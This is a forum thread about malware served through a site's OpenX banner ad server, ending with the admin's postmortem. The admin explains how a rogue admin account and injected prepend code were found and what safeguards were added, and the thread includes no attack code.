VIRUS: Caught One!

FF 3.6, XP Pro SP3. Nothing so far.

Edit: Browser crashing accessing General. On FF 11.0 Linux now to be hopefully a bit safer.

IE8 on XP Pro SP3 nothing here

Me neither. I heard this one affects only people who've recently visited TS porn sites.

There you go then!

I'm married and therefore have had all my hopes and aspirations crushed along with any vestige of self respect or independance of will.

and my wife says I mustn't go on them sites

It's weird: it seems to somehow tie in with what appears to be legitimate analytics code, but it's definitely downloading a Java applet, which when decompiled is doing some really weird stuff to make it hard to follow and which definitely has the capability of downloading a further payload. Now trying to work out why it throws an exception in the debugger...

Nothing here on FF11, W7, AB+, Avast, ........ yet

Come on Nick - I'd expect the perp's home address and phone number by now.

Nah, I've hit a good couple of hundred today without problems. Seen plenty of this:
(And this ?)
(And a little bit of this: )
(Mixed in with some of this: )
(And finally some stuff that was truly: )

No problems at all.

Well, apart from my eyesight...

Admin's just clearing up the adserver - should all be OK shortly

You tell him

Thanks for helping locate the problem Nick. Apologies to all of you for not sorting this one any sooner but as I could not replicate it and could not find any errant code anywhere then was at a complete loss and was not convinced there was problem, or possibly some sort of code that was being added and removed regularly that was making it hard to spot. Should have thought of trying older versions of browsers and also should have looked in more detail at the banner management software. As usual I have excuses so here goes...

The previous malware installer was a VBulletin / VBSeo exploit so when we started getting virus alerts again this was where I checked first. I checked we were patched, checked previous known points of malicious code and found nothing. I could not replicate the problem and as the reports were so infrequent then I did not think it was a major issue.

When I started getting more alerts then I did look at the banner management system - OpenX. I logged in and checked for updates and I checked their site too. Nothing untoward there either and no warnings of problems.

Following the rise in reports today and Nick replicating the problem using old IE versions I did the same and saw my copy of IE6 fail at the point where the banner should be rendered and, like Nick, saw the request to a dyndns.org address via the Charles proxy I had installed. Still not sure I Googled OpenX Dyndns and found this article:
OpenX CSRF Vulnerability Being Actively Exploited | InfosecStuff

It looks like OpenX had their servers hacked and if you were unlucky enough to log into your OpenX install before the hack on their machine was noticed, an admin account on your installation which allowed malicious code to be added to the system. Sure enough the extra admin account had been added and the prepend code added to all banners as described in the article.

As I said, I checked the OpenX site and the version checker on the install as OpenX have previously alerted those on their mailing list to problems like this. So why no alert this time? Well no fix for the compromise has been found and also the source of the attack was their own server from what I understand of the article so instead of holding their hands up they have kept quiet about it IMO. The article states the source of the infection was deleted from the OpenX servers on the 24th April yet the blog post highlighting the problem a couple of days ago and have still not notified their community that this has happened. Ass holes That's the kind of community spirit I love, not fessing up to a problem as it may hurt their credibility.

I am putting some steps in to stop this same problem happening again, basic auth'ing the admin area so even if an admin account is created the attacker won't be able to get in to add the malicious code. Hourly checks for admin accounts via a quick shell script and the check for prepend / append codes in the DB as well.

Apologies again to anyone affected by this and while it will be small consolation to some it has given me a better understanding of where to look should something like this happen again.